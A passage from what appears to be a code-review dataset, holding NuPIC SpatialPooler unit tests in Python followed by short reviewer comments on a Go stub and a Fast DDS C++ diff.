[0.12, 0.15, 0.02, 0.12, 0.09], # no change
[0.53, 0.101, 0.045, 0.109, 0.33], # increment twice
[0.22, 0.1001, 0.15, 0.051, 0.07], # increment four times
[0.101, 0.101, 0.101, 0.101, 0.101]] #increment 9 times
maskPP = numpy.array(range(5))
for i in xrange(sp._numColumns):
perm = sp._permanences.getRow(i)
sp._raisePermanenceToThreshold(perm, maskPP)
for j in xrange(sp._numInputs):
self.assertAlmostEqual(truePermanences[i][j], perm[j])
def testUpdatePermanencesForColumn(self):
sp = SpatialPooler(inputDimensions=[5],
columnDimensions=[5],
synPermConnected=0.1)
sp._synPermTrimThreshold = 0.05
permanences = numpy.array([
[-0.10, 0.500, 0.400, 0.010, 0.020],
[0.300, 0.010, 0.020, 0.120, 0.090],
[0.070, 0.050, 1.030, 0.190, 0.060],
[0.180, 0.090, 0.110, 0.010, 0.030],
[0.200, 0.101, 0.050, -0.09, 1.100]])
# These are the 'true permanences' reflected in trueConnectedSynapses
# truePermanences = SparseMatrix(
# [[0.000, 0.500, 0.400, 0.000, 0.000],
# Clip - - Trim Trim
# [0.300, 0.000, 0.000, 0.120, 0.090],
# - Trim Trim - -
# [0.070, 0.050, 1.000, 0.190, 0.060],
# - - Clip - -
# [0.180, 0.090, 0.110, 0.000, 0.000],
# - - - Trim Trim
# [0.200, 0.101, 0.050, 0.000, 1.000]])
# - - - Clip Clip
trueConnectedSynapses = [
[0, 1, 1, 0, 0],
[1, 0, 0, 1, 0],
[0, 0, 1, 1, 0],
[1, 0, 1, 0, 0],
[1, 1, 0, 0, 1]]
trueConnectedCounts = [2, 2, 2, 2, 3]
for columnIndex in xrange(sp._numColumns):
sp._updatePermanencesForColumn(permanences[columnIndex], columnIndex)
self.assertListEqual(
trueConnectedSynapses[columnIndex],
list(sp._connectedSynapses[columnIndex])
)
self.assertListEqual(trueConnectedCounts, list(sp._connectedCounts))
def testCalculateOverlap(self):
"""
Test that column computes overlap and percent overlap correctly.
"""
sp = SpatialPooler(inputDimensions = [10],
columnDimensions = [5])
sp._connectedSynapses = (
BinaryCorticalColumns([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1]]))
sp._connectedCounts = numpy.array([10.0, 8.0, 6.0, 4.0, 2.0])
inputVector = numpy.zeros(sp._numInputs, dtype='float32')
overlaps = sp._calculateOverlap(inputVector)
overlapsPct = sp._calculateOverlapPct(overlaps)
trueOverlaps = list(numpy.array([0, 0, 0, 0, 0]))
trueOverlapsPct = list(numpy.array([0, 0, 0, 0, 0]))
self.assertListEqual(list(overlaps), trueOverlaps)
self.assertListEqual(list(overlapsPct), trueOverlapsPct)
sp._connectedSynapses = (
BinaryCorticalColumns([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1]]))
sp._connectedCounts = numpy.array([10.0, 8.0, 6.0, 4.0, 2.0])
inputVector = numpy.ones(sp._numInputs, dtype='float32')
overlaps = sp._calculateOverlap(inputVector)
overlapsPct = sp._calculateOverlapPct(overlaps)
trueOverlaps = list(numpy.array([10, 8, 6, 4, 2]))
trueOverlapsPct = list(numpy.array([1, 1, 1, 1, 1]))
self.assertListEqual(list(overlaps), trueOverlaps)
self.assertListEqual(list(overlapsPct), trueOverlapsPct)
sp._connectedSynapses = (
BinaryCorticalColumns([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1]]))
sp._connectedCounts = numpy.array([10.0, 8.0, 6.0, 4.0, 2.0])
inputVector = numpy.zeros(sp._numInputs, dtype='float32')
inputVector[9] = 1
overlaps = sp._calculateOverlap(inputVector)
overlapsPct = sp._calculateOverlapPct(overlaps)
trueOverlaps = list(numpy.array([1, 1, 1, 1, 1]))
trueOverlapsPct = list(numpy.array([0.1, 0.125, 1.0/6, 0.25, 0.5]))
self.assertListEqual(list(overlaps), trueOverlaps)
self.assertListEqual(list(overlapsPct), trueOverlapsPct)
# Zig-zag
sp._connectedSynapses = (
BinaryCorticalColumns([[1, 0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1]]))
sp._connectedCounts = numpy.array([2.0, 2.0, 2.0, 2.0, 2.0])
inputVector = numpy.zeros(sp._numInputs, dtype='float32')
inputVector[range(0, 10, 2)] = 1
overlaps = sp._calculateOverlap(inputVector)
overlapsPct = sp._calculateOverlapPct(overlaps)
trueOverlaps = list(numpy.array([1, 1, 1, 1, 1]))
trueOverlapsPct = list(numpy.array([0.5, 0.5, 0.5, 0.5, 0.5]))
self.assertListEqual(list(overlaps), trueOverlaps)
self.assertListEqual(list(overlapsPct), trueOverlapsPct)
def testInitPermanence1(self):
"""
    Test initial permanence generation. Ensure that the correct number of
    synapses are initialized in a connected state, with permanence values
    drawn from the correct ranges.
"""
sp = self._sp
sp._inputDimensions = numpy.array([10])
sp._numInputs = 10
sp._raisePermanenceToThreshold = Mock()
sp._potentialRadius = 2
connectedPct = 1
mask = numpy.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1])
perm = sp._initPermanence(mask, connectedPct)
connected = (perm >= sp._synPermConnected).astype(int)
numcon = (connected.nonzero()[0]).size
self.assertEqual(numcon, 5)
connectedPct = 0
perm = sp._initPermanence(mask, connectedPct)
connected = (perm >= sp._synPermConnected).astype(int)
numcon = (connected.nonzero()[0]).size
self.assertEqual(numcon, 0)
connectedPct = 0.5
sp._potentialRadius = 100
sp._numInputs = 100
mask = numpy.ones(100)
perm = sp._initPermanence(mask, connectedPct)
connected = (perm >= sp._synPermConnected).astype(int)
numcon = (connected.nonzero()[0]).size
self.assertGreater(numcon, 0)
self.assertLess(numcon, sp._numInputs)
minThresh = 0.0
maxThresh = sp._synPermMax
self.assertEqual(numpy.logical_and((perm >= minThresh),
(perm <= maxThresh)).all(), True)
def testInitPermanence2(self):
"""
    Test initial permanence generation. Ensure that permanence values
    are only assigned to bits within a column's potential pool.
"""
sp = self._sp
sp._raisePermanenceToThreshold = Mock()
sp._numInputs = 10
connectedPct = 1
mask = numpy.array([1, 1, 0, 0, 0, 0, 0, 0, 0, 0])
perm = sp._initPermanence(mask, connectedPct)
connected = list((perm > 0).astype(int))
trueConnected = [1, 1, 0, 0, 0, 0, 0, 0, 0, 0]
self.assertListEqual(connected, trueConnected)
sp._numInputs = 10
connectedPct = 1
mask = numpy.array([0, 0, 0, 0, 1, 1, 1, 0, 0, 0])
perm = sp._initPermanence(mask, connectedPct)
connected = list((perm > 0).astype(int))
trueConnected = [0, 0, 0, 0, 1, 1, 1, 0, 0, 0]
self.assertListEqual(connected, trueConnected)
sp._numInputs = 10
connectedPct = 1
mask = numpy.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1])
perm = sp._initPermanence(mask, connectedPct)
connected = list((perm > 0).astype(int))
trueConnected = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1]
self.assertListEqual(connected, trueConnected)
sp._numInputs = 10
connectedPct = 1
mask = numpy.array([1, 1, 1, 1, 1, 1, 1, 0, 1, 1])
perm = sp._initPermanence(mask, connectedPct)
connected = list((perm > 0).astype(int))
trueConnected = [1, 1, 1, 1, 1, 1, 1, 0, 1, 1]
self.assertListEqual(connected, trueConnected)
def testUpdateDutyCycleHelper(self):
"""
    Tests that duty cycles are updated properly according
    to the mathematical formula. Also checks the effect of
    supplying a period to the function.
"""
dc = numpy.zeros(5)
dc = numpy.array([1000.0, 1000.0, 1000.0, 1000.0, 1000.0])
period = 1000
newvals = numpy.zeros(5)
newDc = SpatialPooler._updateDutyCyclesHelper(dc, newvals, period)
trueNewDc = [999, 999, 999, 999, 999]
self.assertListEqual(list(newDc), trueNewDc)
dc = numpy.array([1000.0, 1000.0, 1000.0, 1000.0, 1000.0])
period = 1000
newvals = numpy.zeros(5)
newvals.fill(1000)
newDc = SpatialPooler._updateDutyCyclesHelper(dc, newvals, period)
trueNewDc = list(dc)
self.assertListEqual(list(newDc), trueNewDc)
dc = numpy.array([1000, 1000, 1000, 1000, 1000])
newvals = numpy.array([2000, 4000, 5000, 6000, 7000])
period = 1000
newDc = SpatialPooler._updateDutyCyclesHelper(dc, newvals, period)
trueNewDc = [1001, 1003, 1004, 1005, 1006]
self.assertListEqual(list(newDc), trueNewDc)
dc = numpy.array([1000, 800, 600, 400, 2000])
newvals = numpy.zeros(5)
period = 2
newDc = SpatialPooler._updateDutyCyclesHelper(dc, newvals, period)
trueNewDc = [500, 400, 300, 200, 1000]
self.assertListEqual(list(newDc), trueNewDc)
def testInhibitColumnsGlobal(self):
"""
    Tests that global inhibition picks the correct number of
    top overlap scores as winning columns.
"""
sp = self._sp
density = 0.3
sp._numColumns = 10
overlaps = numpy.array([1, 2, 1, 4, 8, 3, 12, 5, 4, 1])
active = list(sp._inhibitColumnsGlobal(overlaps, density))
trueActive = numpy.zeros(sp._numColumns)
trueActive = [4, 6, 7]
self.assertListEqual(list(trueActive), active)
density = 0.5
sp._numColumns = 10
overlaps = numpy.array(range(10))
active = list(sp._inhibitColumnsGlobal(overlaps, density))
trueActive = numpy.zeros(sp._numColumns)
trueActive = range(5, 10)
self.assertListEqual(trueActive, active)
def testInhibitColumnsLocal(self):
sp = self._sp
density = 0.5
sp._numColumns = 10
sp._columnDimensions = numpy.array([sp._numColumns])
sp._inhibitionRadius = 2
overlaps = numpy.array([1, 2, 7, 0, 3, 4, 16, 1, 1.5, 1.7])
# L W W L L W W L L W
trueActive = [1, 2, 5, 6, 9]
active = list(sp._inhibitColumnsLocal(overlaps, density))
self.assertListEqual(trueActive, active)
density = 0.5
sp._numColumns = 10
sp._columnDimensions = numpy.array([sp._numColumns])
sp._inhibitionRadius = 3
overlaps = numpy.array([1, 2, 7, 0, 3, 4, 16, 1, 1.5, 1.7])
# L W W L L W W L L L
trueActive = [1, 2, 5, 6]
active = list(sp._inhibitColumnsLocal(overlaps, density))
# self.assertListEqual(trueActive, active)
# Test add to winners
density = 0.3333
sp._numColumns = 10
sp._columnDimensions = numpy.array([sp._numColumns])
sp._inhibitionRadius = 3
overlaps = numpy.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
# W W L L W W L L L W
trueActive = [0, 1, 4, 5, 8]
active = list(sp._inhibitColumnsLocal(overlaps, density))
self.assertListEqual(trueActive, active)
def testGetNeighbors1D(self):
"""
    Test that the _getNeighbors1D static method correctly computes
    the neighbors of a column.
"""
sp = self._sp
layout = numpy.array([0, 0, 1, 0, 1, 0, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 3
dimensions = numpy.array([8])
radius = 1
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([0, 1, 1, 0, 1, 1, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 3
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([0, 1, 1, 0, 0, 0, 1, 1])
layout1D = layout.reshape(-1)
columnIndex = 0
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([0, 1, 1, 0, 0, 0, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 0
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
    # Radius too big
layout = numpy.array([1, 1, 1, 1, 1, 1, 0, 1])
layout1D = layout.reshape(-1)
columnIndex = 6
dimensions = numpy.array([8])
radius = 20
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([1, 1, 1, 1, 1, 1, 0, 1])
layout1D = layout.reshape(-1)
columnIndex = 6
dimensions = numpy.array([8])
radius = 20
mask = sp._getNeighbors1D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
def testGetNeighbors2D(self):
"""
    Test that the _getNeighbors2D static method correctly computes
    the neighbors of a column and maps them from 2D back to 1D.
"""
sp = self._sp
layout = numpy.array([
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 1, 0, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 1
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array(
[[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 2
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Radius too big
layout = numpy.array(
[[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 7
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Wrap-around
layout = numpy.array(
[[1, 0, 0, 1, 1],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 0, 0, 1, 1],
[1, 0, 0, 1, 0]])
layout1D = layout.reshape(-1)
dimensions = numpy.array([6, 5])
columnIndex = dimensions.prod() -1
radius = 1
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array(
[[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 1, 1],
[0, 0, 0, 1, 0]])
layout1D = layout.reshape(-1)
dimensions = numpy.array([6, 5])
columnIndex = dimensions.prod() -1
radius = 1
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=False)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
def testGetNeighborsND(self):
sp = self._sp
dimensions = numpy.array([5, 7, 2])
layout1D = numpy.array(range(numpy.prod(dimensions)))
layout = numpy.reshape(layout1D, dimensions)
radius = 1
x = 1
y = 3
z = 2
columnIndex = layout[z][y][x]
neighbors = sp._getNeighborsND(columnIndex, dimensions, radius,
wrapAround=True)
trueNeighbors = set()
for i in range(-radius, radius+1):
for j in range(-radius, radius+1):
for k in range(-radius, radius+1):
zprime = (z + i) % dimensions[0]
yprime = (y + j) % dimensions[1]
xprime = (x + k) % dimensions[2]
trueNeighbors.add(
layout[zprime][yprime][xprime]
)
trueNeighbors.remove(columnIndex)
self.assertListEqual(sorted(list(trueNeighbors)),
sorted(list(neighbors)))
dimensions = numpy.array([5, 7, 9])
layout1D = numpy.array(range(numpy.prod(dimensions)))
layout = numpy.reshape(layout1D, dimensions)
radius = 3
x = 0
y = 0
z = 3
columnIndex = layout[z][y][x]
neighbors = sp._getNeighborsND(columnIndex, dimensions, radius,
wrapAround=True)
trueNeighbors = set()
for i in range(-radius, radius+1):
for j in range(-radius, radius+1):
for k in range(-radius, radius+1):
zprime = (z + i) % dimensions[0]
yprime = (y + j) % dimensions[1]
xprime = (x + k) % dimensions[2]
trueNeighbors.add(
layout[zprime][yprime][xprime]
)
trueNeighbors.remove(columnIndex)
self.assertListEqual(sorted(list(trueNeighbors)),
sorted(list(neighbors)))
dimensions = numpy.array([5, 10, 7, 6])
layout1D = numpy.array(range(numpy.prod(dimensions)))
layout = numpy.reshape(layout1D, dimensions)
radius = 4
w = 2
x = 5
y = 6
z = 2
columnIndex = layout[z][y][x][w]
neighbors = sp._getNeighborsND(columnIndex, dimensions, radius,
wrapAround=True)
trueNeighbors = set()
for i in range(-radius, radius+1):
for j in range(-radius, radius+1):
for k in range(-radius, radius+1):
for m in range(-radius, radius+1):
zprime = (z + i) % dimensions[0]
yprime = (y + j) % dimensions[1]
xprime = (x + k) % dimensions[2]
wprime = (w + m) % dimensions[3]
trueNeighbors.add(layout[zprime][yprime][xprime][wprime])
trueNeighbors.remove(columnIndex)
self.assertListEqual(sorted(list(trueNeighbors)), sorted(list(neighbors)))
# These are all the same tests from 1D
layout = numpy.array([0, 0, 1, 0, 1, 0, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 3
dimensions = numpy.array([8])
radius = 1
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([0, 1, 1, 0, 1, 1, 0, 0])
layout1D = layout.reshape(-1)
columnIndex = 3
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Wrap around
layout = numpy.array([0, 1, 1, 0, 0, 0, 1, 1])
layout1D = layout.reshape(-1)
columnIndex = 0
dimensions = numpy.array([8])
radius = 2
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Radius too big
layout = numpy.array([1, 1, 1, 1, 1, 1, 0, 1])
layout1D = layout.reshape(-1)
columnIndex = 6
dimensions = numpy.array([8])
radius = 20
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# These are all the same tests from 2D
layout = numpy.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 1, 0, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]])
layout1D = layout.reshape(-1)
columnIndex = 3*5 + 2
dimensions = numpy.array([6, 5])
radius = 1
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
layout = numpy.array([[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 2
mask = sp._getNeighbors2D(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Radius too big
layout = numpy.array([[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 0, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]])
layout1D = layout.reshape(-1)
columnIndex = 3*5+ 2
dimensions = numpy.array([6, 5])
radius = 7
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
# Wrap-around
layout = numpy.array([[1, 0, 0, 1, 1],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 0, 0, 1, 1],
[1, 0, 0, 1, 0]])
layout1D = layout.reshape(-1)
dimensions = numpy.array([6, 5])
columnIndex = dimensions.prod() -1
radius = 1
mask = sp._getNeighborsND(columnIndex, dimensions, radius, wrapAround=True)
negative = set(range(dimensions.prod())) - set(mask)
self.assertEqual(layout1D[mask].all(), True)
self.assertEqual(layout1D[list(negative)].any(), False)
@unittest.skipUnless(
capnp, "pycapnp is not installed, skipping serialization test.")
def testWriteRead(self):
sp1 = SpatialPooler(
inputDimensions=[9],
columnDimensions=[5],
potentialRadius=3,
potentialPct=0.5,
globalInhibition=False,
localAreaDensity=-1.0,
numActiveColumnsPerInhArea=3,
stimulusThreshold=1,
synPermInactiveDec=0.01,
synPermActiveInc=0.1,
synPermConnected=0.10,
minPctOverlapDutyCycle=0.1,
minPctActiveDutyCycle=0.1,
dutyCyclePeriod=10,
maxBoost=10.0,
seed=42,
spVerbosity=0)
sp2 = SpatialPooler(
inputDimensions=[3, 3],
columnDimensions=[2, 2],
potentialRadius=5,
potentialPct=0.4,
globalInhibition=True,
localAreaDensity=1.0,
numActiveColumnsPerInhArea=4,
stimulusThreshold=2,
synPermInactiveDec=0.05,
synPermActiveInc=0.2,
synPermConnected=0.15,
minPctOverlapDutyCycle=0.2,
minPctActiveDutyCycle=0.2,
dutyCyclePeriod=11,
maxBoost=14.0,
seed=10,
spVerbosity=0)
# Run a record through before serializing
inputVector = numpy.array([1, 0, 1, 0, 1, 0, 0, 1, 1])
activeArray1 = numpy.zeros(5)
sp1.compute(inputVector, True, activeArray1)
proto1 = SpatialPoolerProto_capnp.SpatialPoolerProto.new_message()
sp1.write(proto1)
# Write the proto to a temp file and read it back into a new proto
with tempfile.TemporaryFile() as f:
proto1.write(f)
f.seek(0)
proto2 = SpatialPoolerProto_capnp.SpatialPoolerProto.read(f)
# Load the deserialized proto
sp2.read(proto2)
# Check that the two spatial poolers have the same attributes
self.assertSetEqual(set(sp1.__dict__.keys()), set(sp2.__dict__.keys()))
for k, v1 in sp1.__dict__.iteritems():
v2 = getattr(sp2, k)
if isinstance(v1, numpy.ndarray):
self.assertEqual(v1.dtype, v2.dtype,
"Key %s has differing dtypes: %s vs %s" % (
k, v1.dtype, v2.dtype))
self.assertTrue(numpy.isclose(v1, v2).all(), k)
elif isinstance(v1, Random) or isinstance(v1, BinaryCorticalColumns):
pass
elif isinstance(v1, float):
self.assertAlmostEqual(v1, v2)
elif isinstance(v1, numbers.Integral):
self.assertEqual(long(v1), long(v2), k)
else:
self.assertEqual(type(v1), type(v2), k)
self.assertEqual(v1, v2, k)
# Run a record through after deserializing and check results match
activeArray2 = numpy.zeros(5)
sp1.compute(inputVector, True, activeArray1)
sp2.compute(inputVector, True, activeArray2)
indices1 = set(activeArray1.nonzero()[0])
indices2 = set(activeArray2.nonzero()[0])
self.assertSetEqual(indices1, indices2)
def testRandomSPDoesNotLearn(self):
sp = SpatialPooler(inputDimensions=[5],
columnDimensions=[10])
inputArray = (numpy.random.rand(5) > 0.5).astype(uintDType)
activeArray = numpy.zeros(sp._numColumns).astype(realDType)
# Should start off at 0
self.assertEqual(sp._iterationNum, 0)
self.assertEqual(sp._iterationLearnNum, 0)
# Store the initialized state
initialPerms = copy(sp._permanences)
sp.compute(inputArray, False, activeArray)
# Should have incremented general counter but not learning counter
self.assertEqual(sp._iterationNum, 1)
self.assertEqual(sp._iterationLearnNum, 0)
# Check the initial perm state was not modified either
self.assertEqual(sp._permanences, initialPerms)
@unittest.skip("Ported from the removed FlatSpatialPooler but fails. \
See: https://github.com/numenta/nupic/issues/1897")
def testActiveColumnsEqualNumActive(self):
'''
After feeding in a record, the number of active columns should
always be equal to numActiveColumnsPerInhArea.
'''
for i in [1, 10, 50]:
numActive = i
inputShape = 10
sp = SpatialPooler(inputDimensions=[inputShape],
columnDimensions=[100],
numActiveColumnsPerInhArea=numActive)
inputArray = (numpy.random.rand(inputShape) > 0.5).astype(uintDType)
inputArray2 = (numpy.random.rand(inputShape) > 0.8).astype(uintDType)
activeArray = numpy.zeros(sp._numColumns).astype(realDType)
# Default, learning on
sp.compute(inputArray, True, activeArray)
sp.compute(inputArray2, True, activeArray)
self.assertEqual(sum(activeArray), numActive)
# learning OFF
sp.compute(inputArray, False, activeArray)
sp.compute(inputArray2, False, activeArray)
self.assertEqual(sum(activeArray), numActive)
if __name__ == "__main__":
unittest.main()
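# Illustrative note, not part of the original test file: a minimal hypothetical
# sketch of the set-based comparison suggested in this record's review message
# (cast the nonzero indices of the two activation arrays to Python sets and
# compare them, as testWriteRead above already does for its compute outputs).
# The arrays below are made-up stand-ins, not values from the real spatial pooler.
#
# import numpy
#
# activeArray1 = numpy.array([0, 1, 0, 1, 1])
# activeArray2 = numpy.array([0, 1, 0, 1, 1])
#
# indices1 = set(activeArray1.nonzero()[0])
# indices2 = set(activeArray2.nonzero()[0])
# assert indices1 == indices2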
| 1 | 19,782 | Can also cast them as `set`s and compare them. | numenta-nupic | py |
@@ -0,0 +1 @@
+package trigger | 1 | 1 | 20,991 | Still TODO I guess? | jetstack-cert-manager | go |
|
@@ -37,8 +37,6 @@
#include <fastdds/rtps/builtin/BuiltinProtocols.h>
#include <fastdds/rtps/builtin/liveliness/WLP.h>
-#include <functional>
-
using namespace eprosima::fastrtps;
using namespace ::rtps;
using namespace std::chrono; | 1 | // Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima).
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/*
* Publisher.cpp
*
*/
#include <fastrtps_deprecated/publisher/PublisherImpl.h>
#include <fastrtps_deprecated/participant/ParticipantImpl.h>
#include <fastrtps/publisher/Publisher.h>
#include <fastdds/dds/topic/TopicDataType.hpp>
#include <fastrtps/publisher/PublisherListener.h>
#include <fastdds/rtps/writer/RTPSWriter.h>
#include <fastdds/rtps/writer/StatefulWriter.h>
#include <fastdds/rtps/writer/StatelessWriter.h>
#include <fastdds/rtps/participant/RTPSParticipant.h>
#include <fastdds/rtps/RTPSDomain.h>
#include <fastrtps/log/Log.h>
#include <fastrtps/utils/TimeConversion.h>
#include <fastdds/rtps/resources/ResourceEvent.h>
#include <fastdds/rtps/resources/TimedEvent.h>
#include <fastdds/rtps/builtin/BuiltinProtocols.h>
#include <fastdds/rtps/builtin/liveliness/WLP.h>
#include <functional>
using namespace eprosima::fastrtps;
using namespace ::rtps;
using namespace std::chrono;
using eprosima::fastdds::dds::TopicDataType;
PublisherImpl::PublisherImpl(
ParticipantImpl* p,
TopicDataType* pdatatype,
